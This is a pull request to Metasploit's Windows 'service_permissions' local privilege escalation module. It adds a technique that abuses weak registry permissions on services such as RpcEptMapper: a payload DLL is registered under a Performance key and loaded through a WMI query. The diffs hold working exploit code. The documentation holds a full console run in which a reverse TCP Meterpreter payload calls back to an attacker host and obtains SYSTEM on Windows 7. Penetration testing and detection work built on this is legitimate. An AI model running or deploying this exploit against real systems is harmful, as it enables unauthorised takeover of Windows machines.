### PR TITLE
Add the Weak Registry Permissions technique to the Service Permissions LPE

### DIFF
--- a/documentation/modules/exploit/windows/local/service_permissions.md
+++ b/documentation/modules/exploit/windows/local/service_permissions.md
@@ -1,0 +1,156 @@
+This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a
+service fails, this module will inspect existing services to look for insecure configuration, file or registry
+permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will
+result in a new session when this succeeds.
+
+## Escalation Techniques
+This module attempts the following techniques to execute a payload as SYSTEM. All techniques involve writing artifacts
+to disk on the target system.
+
+### Technique: New Service Creation
+The module will attempt to create a new service. This generally will not work unless the session is running as a user
+with elevated privileges (such as Local Administrator) that are sufficient to create new services.
+
+### Technique: Weak Service Permissions
+The module will attempt to make changes to an existing service. This enumerates existing services and checks for the
+permissions to edit each one. When one is found, the service is updated to execute a payload.
+
+### Technique: Weak File System Permissions
+The module will examine the file system permissions of the executable associated with each existing service. If one is
+found where the user has write access, the module will leverage it to execute a payload in place of the original service
+executable.
+
+### Technique: Weak Registry Permissions
+The module will check the permissions on each service's respective registry entries. It will then attempt to create a
+`Performance` where it can add values necessary to force a DLL to be loaded. Once completed, a WMI query is executed to
+trigger the payload. This technique was originally discovered by Clément Labro and disclosed in the blog [Windows
+RpcEptMapper Service Insecure Registry Permissions EoP](https://itm4n.github.io/windows-registry-rpceptmapper-eop/) on
+November 12th, 2020.
+
+**This technique notably affects default and fully patched installations of Windows 7 and Server 2008 R2.** Users can
+set the `TargetServiceName` option to `rpceptmapper` in this case. For an example, see the scenario below.
+
+## Vulnerable Application
+
+This technique is applicable to any version of Windows. A vulnerable installation however typically involves third-party
+software that installs a service with insecure permissions. Furthermore, a user with Local Administrator privileges can
+leverage this module to escalate to system by creating a new service.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use [module path]`
+1. Do: `run`
+1. You should get a shell.
+
+## Options
+
+### AGGRESSIVE
+Exploit as many services as possible (dangerous). When enabled, the module will continue to check for additional
+services even after a vulnerable one has been found.
+
+### TargetServiceName
+The name of a specific service to target. This can be used to avoid targeting all available services in the case where
+the module user wants to target a specific one. When specified, the service name is compared to others in a
+case-insensitive manner per the [`CreateServiceA`][CreateServiceA] documentation.
+
+## Scenarios
+Specific demo of using the module that might be useful in a real world scenario.
+
+### Windows 7 SP1 x64 (Weak Registry Permissions Technique)
+
+```
+msf6 exploit(windows/local/service_permissions) > sessions -i -1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: WIN-9NSI4A6AIHJ\aliddle
+meterpreter > sysinfo
+Computer        : WIN-9NSI4A6AIHJ
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x64/windows
+meterpreter > getsystem 
+[-] 2001: Operation failed: This function is not supported on this system. The following was attempted:
+[-] Named Pipe Impersonation (In Memory/Admin)
+[-] Named Pipe Impersonation (Dropper/Admin)
+[-] Token Duplication (In Memory/Admin)
+[-] Named Pipe Impersonation (RPCSS variant)
+meterpreter > background 
+[*] Backgrounding session 1...
+msf6 exploit(windows/local/service_permissions) > set SESSION -1
+SESSION => -1
+msf6 exploit(windows/local/service_permissions) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
+PAYLOAD => windows/x64/meterpreter/reverse_tcp
+msf6 exploit(windows/local/service_permissions) > set LHOST 192.168.159.128 
+LHOST => 192.168.159.128
+msf6 exploit(windows/local/service_permissions) > set TargetServiceName rpceptmapper
+TargetServiceName => rpceptmapper
+msf6 exploit(windows/local/service_permissions) > set VERBOSE true
+VERBOSE => true
+msf6 exploit(windows/local/service_permissions) > show options 
+
+Module options (exploit/windows/local/service_permissions):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   AGGRESSIVE  false            no        Exploit as many services as possible (dangerous)
+   SESSION     -1               yes       The session to run this module on.
+   TIMEOUT     10               yes       Timeout for WMI command in seconds
+
+
+Payload options (windows/x64/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+msf6 exploit(windows/local/service_permissions) > exploit
+
+[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Trying to find weak permissions in existing services..
+[-] Request Error 3014: Operation failed: Access is denied. falling back to registry technique
+[*] [RpcEptMapper] Checking for weak file permissions
+[-] The operation completed successfully.: C:\Windows\system32\svchost.exe
+[*] [RpcEptMapper] Checking for weak service permissions
+[*] [RpcEptMapper] Could not open service. OpenServiceA error: Access is denied.
+[*] [RpcEptMapper] Checking for weak registry permissions
+[+] [RpcEptMapper] Created registry key: HKLM\System\CurrentControlSet\Services\RpcEptMapper\Performance
+[*] [RpcEptMapper] Writing payload DLL to C:\Users\aliddle\AppData\Local\Temp\njabikLo.dll
+[*] [RpcEptMapper] Triggering the payload via WMI...
+[*] [localhost] wmic /output:CLIPBOARD /INTERACTIVE:off /node:localhost Path Win32_Perf Get
+[*] Sending stage (200262 bytes) to 192.168.159.61
+[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.61:50169) at 2020-11-19 12:23:41 -0500
+[*] Sending stage (200262 bytes) to 192.168.159.61
+[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.61:50170) at 2020-11-19 12:23:41 -0500
+[*] Sending stage (200262 bytes) to 192.168.159.61
+[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.61:50171) at 2020-11-19 12:23:42 -0500
+[*] Sending stage (200262 bytes) to 192.168.159.61
+[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.61:50172) at 2020-11-19 12:23:42 -0500
+[*] Sending stage (200262 bytes) to 192.168.159.61
+[*] Meterpreter session 6 opened (192.168.159.128:4444 -> 192.168.159.61:50173) at 2020-11-19 12:23:42 -0500
+[*] Sending stage (200262 bytes) to 192.168.159.61
+[+] Deleted C:\Users\aliddle\AppData\Local\Temp\njabikLo.dll
+[*] Meterpreter session 7 opened (192.168.159.128:4444 -> 192.168.159.61:50174) at 2020-11-19 12:23:43 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > 
+```
+
+[CreateServiceA]: https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea

--- a/documentation/modules/exploit/windows/local/service_permissions.md
+++ b/documentation/modules/exploit/windows/local/service_permissions.md
@@ -22,13 +22,15 @@ executable.
 
 ### Technique: Weak Registry Permissions
 The module will check the permissions on each service's respective registry entries. It will then attempt to create a
-`Performance` where it can add values necessary to force a DLL to be loaded. Once completed, a WMI query is executed to
-trigger the payload. This technique was originally discovered by Clément Labro and disclosed in the blog [Windows
+`Performance` key where it can add values necessary to force a DLL to be loaded. Once completed, a WMI query is executed
+to trigger the payload. This technique was originally discovered by Clément Labro and disclosed in the blog [Windows
 RpcEptMapper Service Insecure Registry Permissions EoP](https://itm4n.github.io/windows-registry-rpceptmapper-eop/) on
 November 12th, 2020.
 
-**This technique notably affects default and fully patched installations of Windows 7 and Server 2008 R2.** Users can
-set the `TargetServiceName` option to `rpceptmapper` in this case. For an example, see the scenario below.
+**This technique notably affects default and fully patched installations of Windows 7 and Server 2008 R2.** Users should
+either set the `TargetServiceName` option to `rpceptmapper` or enable the `AGGRESSIVE` option in this case. Without one
+of these settings, it's possible the module may find an affected service other than the RpcEptMapper which may not yield
+a session with elevated privileges. For an example, see the scenario below.
 
 ## Vulnerable Application
 
@@ -75,25 +77,25 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 1
 Meterpreter     : x64/windows
-meterpreter > getsystem 
+meterpreter > getsystem
 [-] 2001: Operation failed: This function is not supported on this system. The following was attempted:
 [-] Named Pipe Impersonation (In Memory/Admin)
 [-] Named Pipe Impersonation (Dropper/Admin)
 [-] Token Duplication (In Memory/Admin)
 [-] Named Pipe Impersonation (RPCSS variant)
-meterpreter > background 
+meterpreter > background
 [*] Backgrounding session 1...
 msf6 exploit(windows/local/service_permissions) > set SESSION -1
 SESSION => -1
 msf6 exploit(windows/local/service_permissions) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
 PAYLOAD => windows/x64/meterpreter/reverse_tcp
-msf6 exploit(windows/local/service_permissions) > set LHOST 192.168.159.128 
+msf6 exploit(windows/local/service_permissions) > set LHOST 192.168.159.128
 LHOST => 192.168.159.128
 msf6 exploit(windows/local/service_permissions) > set TargetServiceName rpceptmapper
 TargetServiceName => rpceptmapper
 msf6 exploit(windows/local/service_permissions) > set VERBOSE true
 VERBOSE => true
-msf6 exploit(windows/local/service_permissions) > show options 
+msf6 exploit(windows/local/service_permissions) > show options
 
 Module options (exploit/windows/local/service_permissions):
 
@@ -122,7 +124,7 @@ Exploit target:
 
 msf6 exploit(windows/local/service_permissions) > exploit
 
-[*] Started reverse TCP handler on 192.168.159.128:4444 
+[*] Started reverse TCP handler on 192.168.159.128:4444
 [*] Trying to find weak permissions in existing services..
 [-] Request Error 3014: Operation failed: Access is denied. falling back to registry technique
 [*] [RpcEptMapper] Checking for weak file permissions
@@ -150,7 +152,7 @@ msf6 exploit(windows/local/service_permissions) > exploit
 
 meterpreter > getuid
 Server username: NT AUTHORITY\SYSTEM
-meterpreter > 
+meterpreter >
 ```
 
 [CreateServiceA]: https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-createservicea

--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb
@@ -1031,13 +1031,13 @@ class Console::CommandDispatcher::Stdapi::Sys
     print @@reg_opts.usage
     print_line("COMMANDS:")
     print_line
-    print_line("    enumkey  Enumerate the supplied registry key [-k <key>]")
-    print_line("    createkey  Create the supplied registry key  [-k <key>]")
-    print_line("    deletekey  Delete the supplied registry key  [-k <key>]")
-    print_line("    queryclass Queries the class of the supplied key [-k <key>]")
-    print_line("    setval Set a registry value [-k <key> -v <val> -d <data>]")
-    print_line("    deleteval  Delete the supplied registry value [-k <key> -v <val>]")
-    print_line("    queryval Queries the data contents of a value [-k <key> -v <val>]")
+    print_line("    enumkey     Enumerate the supplied registry key [-k <key>]")
+    print_line("    createkey   Create the supplied registry key  [-k <key>]")
+    print_line("    deletekey   Delete the supplied registry key  [-k <key>]")
+    print_line("    queryclass  Queries the class of the supplied key [-k <key>]")
+    print_line("    setval      Set a registry value [-k <key> -v <val> -d <data>]")
+    print_line("    deleteval   Delete the supplied registry value [-k <key> -v <val>]")
+    print_line("    queryval    Queries the data contents of a value [-k <key> -v <val>]")
     print_line
   end
 

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Local
         'Description' => %q{
           This module attempts to exploit existing administrative privileges to obtain
           a SYSTEM session. If directly creating a service fails, this module will inspect
-          existing services to look for insecure file or configuration permissions that may
+          existing services to look for insecure configuration, file or registry permissions that may
           be hijacked. It will then attempt to restart the replaced service to run the
           payload. This will result in a new session when this succeeds.
         },

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -127,7 +127,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     unless file?(possible_path)
       # If we can't determine it manually show the user and let them decide if manual inspection is worthwhile
-      print_status("[#{service_name}] Cannot reliably determine path: #{service[:path]}")
+      print_status("[#{service_name}] Cannot reliably determine path: #{possible_path}")
     end
 
     file_permissions = check_dir_perms(possible_path, token)

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -16,40 +16,43 @@ class MetasploitModule < Msf::Exploit::Local
 
   ERROR = Msf::Post::Windows::Error
 
-  def initialize(info={})
-    super( update_info( info,
-      'Name'          => 'Windows Escalate Service Permissions Local Privilege Escalation',
-      'Description'   => %q{
-        This module attempts to exploit existing administrative privileges to obtain
-        a SYSTEM session. If directly creating a service fails, this module will inspect
-        existing services to look for insecure file or configuration permissions that may
-        be hijacked. It will then attempt to restart the replaced service to run the
-        payload. This will result in a new session when this succeeds.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        => [
-        'scriptjunkie',      # service and file permission techniques
-        'Spencer McIntyre',  # registry permission technique
-        'itm4n'              # registry permission technique
-      ],
-      'Arch'          => [ ARCH_X86, ARCH_X64 ],
-      'Platform'      => [ 'win' ],
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultOptions' =>
-        {
-          'EXITFUNC' => 'thread',
-          'WfsDelay' => '5'
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation',
+        'Description' => %q{
+          This module attempts to exploit existing administrative privileges to obtain
+          a SYSTEM session. If directly creating a service fails, this module will inspect
+          existing services to look for insecure file or configuration permissions that may
+          be hijacked. It will then attempt to restart the replaced service to run the
+          payload. This will result in a new session when this succeeds.
         },
-      'Targets'       =>
-        [
-          [ 'Automatic', { } ],
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'scriptjunkie', # service and file permission techniques
+          'Spencer McIntyre', # registry permission technique
+          'itm4n' # registry permission technique
         ],
-      'References' => [
-        ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/']
-      ],
-      'DefaultTarget' => 0,
-      'DisclosureDate'=> '2012-10-15'
-    ))
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'WfsDelay' => '5'
+          },
+        'Targets' =>
+          [
+            [ 'Automatic', {} ],
+          ],
+        'References' => [
+          ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/']
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2012-10-15'
+      )
+    )
 
     register_options([
       OptBool.new('AGGRESSIVE', [ false, 'Exploit as many services as possible (dangerous)', false ])
@@ -63,13 +66,13 @@ class MetasploitModule < Msf::Exploit::Local
   def execute_payload_as_new_service(path)
     success = false
 
-    print_status("Trying to add a new service...")
-    service_name = Rex::Text.rand_text_alpha((rand(8)+6))
-    if service_create(service_name, {:path => path, :display=>""}) == ERROR::SUCCESS
+    print_status('Trying to add a new service...')
+    service_name = Rex::Text.rand_text_alpha((rand(6..13)))
+    if service_create(service_name, { path: path, display: '' }) == ERROR::SUCCESS
       print_status("Created service... #{service_name}")
       write_exe(path, service_name)
       if service_start(service_name) == ERROR::SUCCESS
-        print_good("Service should be started! Enjoy your new SYSTEM meterpreter session.")
+        print_good('Service should be started! Enjoy your new SYSTEM meterpreter session.')
         success = true
       end
 
@@ -86,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
     success = false
     vprint_status("[#{service_name}] Checking for weak service permissions")
 
-    if (service_change_config(service_name, {:path => path}) == ERROR::SUCCESS)
+    if (service_change_config(service_name, { path: path }) == ERROR::SUCCESS)
       print_good("[#{service_name}]  has weak configuration permissions - reconfigured to use exe #{path}")
       print_status("[#{service_name}] Restarting service")
       res = service_stop(service_name)
@@ -101,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Local
         end
       end
 
-      unless (service_change_config(service_name, {:path => service[:path]}) == ERROR::SUCCESS)
+      unless (service_change_config(service_name, { path: service[:path] }) == ERROR::SUCCESS)
         print_error("[#{service_name}] Failed to reset service to original path #{service[:path]}")
       end
     end
@@ -109,11 +112,11 @@ class MetasploitModule < Msf::Exploit::Local
     return success
   end
 
-  def weak_file_permissions(service_name, service, path, token)
+  def weak_file_permissions(service_name, service, _path, token)
     success = false
     vprint_status("[#{service_name}] Checking for weak file permissions")
 
-    #get path to exe; parse out quotes and arguments
+    # get path to exe; parse out quotes and arguments
     original_path = service[:path]
     possible_path = expand_path(original_path)
     if (possible_path[0] == '"')
@@ -147,12 +150,12 @@ class MetasploitModule < Msf::Exploit::Local
         no_access = true
       end
 
-      if stopped or no_access
+      if stopped || no_access
         begin
-          if move_file(possible_path, possible_path+'.bak')
+          if move_file(possible_path, "#{possible_path}.bak")
             write_exe(possible_path, service_name)
-            print_status("[#{service_name}] #{possible_path} moved to #{possible_path + '.bak'} and replaced.")
-            if service_restart(service_name)
+            print_status("[#{service_name}] #{possible_path} moved to #{possible_path}.bak and replaced.")
+            if service_restart(service_name) # rubocop:disable Metrics/BlockNesting
               print_good("[#{service_name}] Service restarted")
               success = true
             else
@@ -172,7 +175,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def weak_registry_permissions(service_name)
     # check the system and payload architectures are compatible, otherwise this technique won't work
-    return false if sysinfo['Architecture'] != get_payload_arch
+    return false if sysinfo['Architecture'] != payload_arch
 
     vprint_status("[#{service_name}] Checking for weak registry permissions")
     backup = nil
@@ -180,11 +183,12 @@ class MetasploitModule < Msf::Exploit::Local
     reg_key = "HKLM\\System\\CurrentControlSet\\Services\\#{service_name}\\Performance"
     if registry_enumvals(reg_key).nil?
       return false unless registry_createkey(reg_key)
+
       print_good("[#{service_name}] Created registry key: #{reg_key}")
     else
       backup = {}
       # backup values to restore later
-      %w{ Library Open Collect Close }.each do |value|
+      %w[Library Open Collect Close].each do |value|
         backup[value] = registry_getvaldata(reg_key, value)
       end
     end
@@ -202,14 +206,14 @@ class MetasploitModule < Msf::Exploit::Local
     registry_setvaldata(reg_key, 'Close', 'ClosePerfData', 'REG_SZ')
 
     vprint_status("[#{service_name}] Triggering the payload via WMI...")
-    wmic_query('Path Win32_Perf Get', server='localhost')
+    wmic_query('Path Win32_Perf Get', server = 'localhost') # rubocop:disable Lint/UselessAssignment
 
     registry_deletekey(reg_key)
 
     if backup.nil?
       registry_deletekey(reg_key)
     else
-      backup.each_pair do |value,data|
+      backup.each_pair do |value, data|
         if data.nil?
           registry_deleteval(reg_key, value)
         else
@@ -223,14 +227,14 @@ class MetasploitModule < Msf::Exploit::Local
 
   # If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to
   # define the correct servicename.
-  def write_exe(path, service_name=nil)
+  def write_exe(path, service_name = nil)
     vprint_status("[#{service_name}] Writing service executable to #{path}")
-    exe = generate_payload_exe_service({servicename: service_name, arch: get_payload_arch})
+    exe = generate_payload_exe_service({ servicename: service_name, arch: payload_arch })
     write_file(path, exe)
     register_files_for_cleanup(path)
   end
 
-  def get_payload_arch
+  def payload_arch
     if payload.arch.include?(ARCH_X64)
       return ARCH_X64
     else
@@ -239,14 +243,14 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    if sysinfo['Architecture'] != get_payload_arch
+    if sysinfo['Architecture'] != payload_arch
       print_error('The registry technique will be skipped because the payload architecture does not match the native system architecture')
     end
-    tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    tempexe_name = "#{Rex::Text.rand_text_alpha(rand(6..13))}.exe"
 
     dir_env = get_envs('SystemRoot', 'TEMP')
     tmpdir = dir_env['TEMP']
-    tempexe = tmpdir + "\\" + tempexe_name
+    tempexe = "#{tmpdir}\\#{tempexe_name}"
 
     if datastore['TargetServiceName'].blank?
       begin
@@ -258,12 +262,13 @@ class MetasploitModule < Msf::Exploit::Local
 
     aggressive = datastore['AGGRESSIVE']
 
-    print_status("Trying to find weak permissions in existing services..")
+    print_status('Trying to find weak permissions in existing services..')
 
     token = get_imperstoken
     each_service do |serv|
       service_name = serv[:name]
       next unless (datastore['TargetServiceName'].blank? || datastore['TargetServiceName'].downcase == service_name.downcase)
+
       service = service_info(service_name)
 
       begin

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -201,10 +201,10 @@ class MetasploitModule < Msf::Exploit::Local
     register_files_for_cleanup(dll_path)
 
     success = true
-    success &= registry_setvaldata(reg_key, 'Library', dll_path, 'REG_SZ')
-    success &= registry_setvaldata(reg_key, 'Open', 'OpenPerfData', 'REG_SZ')
-    success &= registry_setvaldata(reg_key, 'Collect', 'CollectPerfData', 'REG_SZ')
-    success &= registry_setvaldata(reg_key, 'Close', 'ClosePerfData', 'REG_SZ')
+    success &&= registry_setvaldata(reg_key, 'Library', dll_path, 'REG_SZ')
+    success &&= registry_setvaldata(reg_key, 'Open', 'OpenPerfData', 'REG_SZ')
+    success &&= registry_setvaldata(reg_key, 'Collect', 'CollectPerfData', 'REG_SZ')
+    success &&= registry_setvaldata(reg_key, 'Close', 'ClosePerfData', 'REG_SZ')
 
     # don't use session_count to accurately account for AGGRESSIVE mode
     session_count = self.session_count

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -9,6 +9,8 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::File
   include Msf::Post::Windows::Services
   include Msf::Post::Windows::Accounts
+  include Msf::Post::Windows::Registry
+  include Msf::Post::Windows::WMIC
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
 
@@ -25,7 +27,11 @@ class MetasploitModule < Msf::Exploit::Local
         payload. This will result in a new session when this succeeds.
       },
       'License'       => MSF_LICENSE,
-      'Author'        => [ 'scriptjunkie' ],
+      'Author'        => [
+        'scriptjunkie',      # service and file permission techniques
+        'Spencer McIntyre',  # registry permission technique
+        'itm4n'              # registry permission technique
+      ],
       'Arch'          => [ ARCH_X86, ARCH_X64 ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
@@ -38,14 +44,17 @@ class MetasploitModule < Msf::Exploit::Local
         [
           [ 'Automatic', { } ],
         ],
+      'References' => [
+        ['URL', 'https://itm4n.github.io/windows-registry-rpceptmapper-eop/']
+      ],
       'DefaultTarget' => 0,
       'DisclosureDate'=> '2012-10-15'
     ))
 
     register_options([
-      OptBool.new("AGGRESSIVE", [ false, "Exploit as many services as possible (dangerous)", false ])
+      OptBool.new('AGGRESSIVE', [ false, 'Exploit as many services as possible (dangerous)', false ])
     ])
-
+    deregister_options('RHOST', 'SMBUser', 'SMBPass', 'SMBDomain')
   end
 
   def execute_payload_as_new_service(path)
@@ -63,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Local
 
       service_delete(service_name)
     else
-      print_status("No privs to create a service...")
+      print_status('No privileges to create a service...')
       success = false
     end
 
@@ -111,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     unless file?(possible_path)
-      # If we cant determine it manually show the user and let them decide if manual inspection is worthwhile
+      # If we can't determine it manually show the user and let them decide if manual inspection is worthwhile
       print_status("[#{service_name}] Cannot reliably determine path: #{service[:path]}")
     end
 
@@ -137,14 +146,15 @@ class MetasploitModule < Msf::Exploit::Local
 
       if stopped or no_access
         begin
-          if move_file(possible_path, possible_path+'.bak')
-            write_exe(possible_path, service_name)
-            print_status("[#{service_name}]  #{possible_path} moved to #{possible_path+'.bak'} and replaced.")
+          if move_file(possible_path, possible_path + '.bak')
+            $stderro.puts "Moving the file: #{path} -> #{possible_path}"
+            move_file(path, possible_path)  # todo: test this works without re-uploading a new file
+            print_status("[#{service_name}] #{possible_path} moved to #{possible_path + '.bak'} and replaced.")
             if service_restart(service_name)
               print_good("[#{service_name}] Service restarted")
               success = true
             else
-              print_error("Unable to restart service")
+              print_error("[#{service_name}] Unable to restart service")
             end
           end
         rescue Rex::Post::Meterpreter::RequestError => e
@@ -156,6 +166,57 @@ class MetasploitModule < Msf::Exploit::Local
     end
 
     return success
+  end
+
+  def weak_registry_permissions(service_name)
+    # check the system and payload architectures are compatible, otherwise this technique won't work
+    return false if sysinfo['Architecture'] != get_payload_arch
+
+    vprint_status("[#{service_name}] Checking for weak registry permissions")
+    backup = nil
+
+    reg_key = "HKLM\\System\\CurrentControlSet\\Services\\#{service_name}\\Performance"
+    if registry_enumvals(reg_key).nil?
+      return false unless registry_createkey(reg_key)
+      print_good("[#{service_name}] Created registry key: #{reg_key}")
+    else
+      backup = {}
+      # backup values to restore later
+      %w{ Library Open Collect Close }.each do |value|
+        backup[value] = registry_getvaldata(reg_key, value)
+      end
+    end
+
+    envs = get_envs('TEMP')
+
+    dll_path = "#{envs['TEMP']}\\#{Rex::Text.rand_text_alpha(8)}.dll"
+    vprint_status("[#{service_name}] Writing payload DLL to #{dll_path}")
+    write_file(dll_path, generate_payload_dll)
+    register_files_for_cleanup(dll_path)
+
+    registry_setvaldata(reg_key, 'Library', dll_path, 'REG_SZ')
+    registry_setvaldata(reg_key, 'Open', 'OpenPerfData', 'REG_SZ')
+    registry_setvaldata(reg_key, 'Collect', 'CollectPerfData', 'REG_SZ')
+    registry_setvaldata(reg_key, 'Close', 'ClosePerfData', 'REG_SZ')
+
+    vprint_status("[#{service_name}] Triggering the payload via WMI...")
+    wmic_query('Path Win32_Perf Get', server='localhost')
+
+    registry_deletekey(reg_key)
+
+    if backup.nil?
+      registry_deletekey(reg_key)
+    else
+      backup.each_pair do |value,data|
+        if data.nil?
+          registry_deleteval(reg_key, value)
+        else
+          registry_setvaldata(reg_key, value, data, 'REG_SZ')
+        end
+      end
+    end
+
+    false
   end
 
   # If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to
@@ -176,11 +237,12 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    if sysinfo['Architecture'] != get_payload_arch
+      print_error('The registry technique will be skipped because the payload architecture does not match the native system architecture')
+    end
     tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
 
     dir_env = get_envs('SystemRoot', 'TEMP')
-    sysdir = dir_env['SystemRoot']
     tmpdir = dir_env['TEMP']
     tempexe = tmpdir + "\\" + tempexe_name
 
@@ -197,10 +259,13 @@ class MetasploitModule < Msf::Exploit::Local
     token = get_imperstoken
     each_service do |serv|
       service_name =  serv[:name]
+      next unless %w{ gupdate rpceptmapper }.include? service_name.downcase  # todo: remove this after testing
       service = service_info(service_name)
       begin
-        return if weak_file_permissions(service_name, service, tempexe, token) and not aggressive
-        return if weak_service_permissions(service_name, service, tempexe) and not aggressive
+        # todo: restore these after testing
+        return if weak_file_permissions(service_name, service, tempexe, token) && !aggressive
+        #return if weak_service_permissions(service_name, service, tempexe) && !aggressive
+        #return if weak_registry_permissions(service_name) && !aggressive
       rescue RuntimeError => e
         vprint_status("[#{serv[:name]}] #{e}")
       end

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Local
   Rank = GreatRanking
 
   include Msf::Post::File
+  include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Services
   include Msf::Post::Windows::Accounts
   include Msf::Post::Windows::Registry
@@ -254,6 +255,10 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
+    if is_system?
+      fail_with(Failure::None, 'Session is already elevated')
+    end
+
     if sysinfo['Architecture'] != payload_arch
       print_error('The registry technique will be skipped because the payload architecture does not match the native system architecture')
     end

--- a/modules/exploits/windows/local/service_permissions.rb
+++ b/modules/exploits/windows/local/service_permissions.rb
@@ -54,6 +54,9 @@ class MetasploitModule < Msf::Exploit::Local
     register_options([
       OptBool.new('AGGRESSIVE', [ false, 'Exploit as many services as possible (dangerous)', false ])
     ])
+    register_advanced_options([
+      OptString.new('TargetServiceName', [ false, 'The name of a specific service to target', false ])
+    ])
     deregister_options('RHOST', 'SMBUser', 'SMBPass', 'SMBDomain')
   end
 
@@ -146,9 +149,8 @@ class MetasploitModule < Msf::Exploit::Local
 
       if stopped or no_access
         begin
-          if move_file(possible_path, possible_path + '.bak')
-            $stderro.puts "Moving the file: #{path} -> #{possible_path}"
-            move_file(path, possible_path)  # todo: test this works without re-uploading a new file
+          if move_file(possible_path, possible_path+'.bak')
+            write_exe(possible_path, service_name)
             print_status("[#{service_name}] #{possible_path} moved to #{possible_path + '.bak'} and replaced.")
             if service_restart(service_name)
               print_good("[#{service_name}] Service restarted")
@@ -246,10 +248,12 @@ class MetasploitModule < Msf::Exploit::Local
     tmpdir = dir_env['TEMP']
     tempexe = tmpdir + "\\" + tempexe_name
 
-    begin
-      return if execute_payload_as_new_service(tempexe)
-    rescue RuntimeError => e
-      vprint_status("Unable to create a new service: #{e}")
+    if datastore['TargetServiceName'].blank?
+      begin
+        return if execute_payload_as_new_service(tempexe)
+      rescue RuntimeError => e
+        vprint_status("Unable to create a new service: #{e}")
+      end
     end
 
     aggressive = datastore['AGGRESSIVE']
@@ -258,14 +262,24 @@ class MetasploitModule < Msf::Exploit::Local
 
     token = get_imperstoken
     each_service do |serv|
-      service_name =  serv[:name]
-      next unless %w{ gupdate rpceptmapper }.include? service_name.downcase  # todo: remove this after testing
+      service_name = serv[:name]
+      next unless (datastore['TargetServiceName'].blank? || datastore['TargetServiceName'].downcase == service_name.downcase)
       service = service_info(service_name)
+
       begin
-        # todo: restore these after testing
         return if weak_file_permissions(service_name, service, tempexe, token) && !aggressive
-        #return if weak_service_permissions(service_name, service, tempexe) && !aggressive
-        #return if weak_registry_permissions(service_name) && !aggressive
+      rescue RuntimeError => e
+        vprint_status("[#{serv[:name]}] #{e}")
+      end
+
+      begin
+        return if weak_service_permissions(service_name, service, tempexe) && !aggressive
+      rescue RuntimeError => e
+        vprint_status("[#{serv[:name]}] #{e}")
+      end
+
+      begin
+        return if weak_registry_permissions(service_name) && !aggressive
       rescue RuntimeError => e
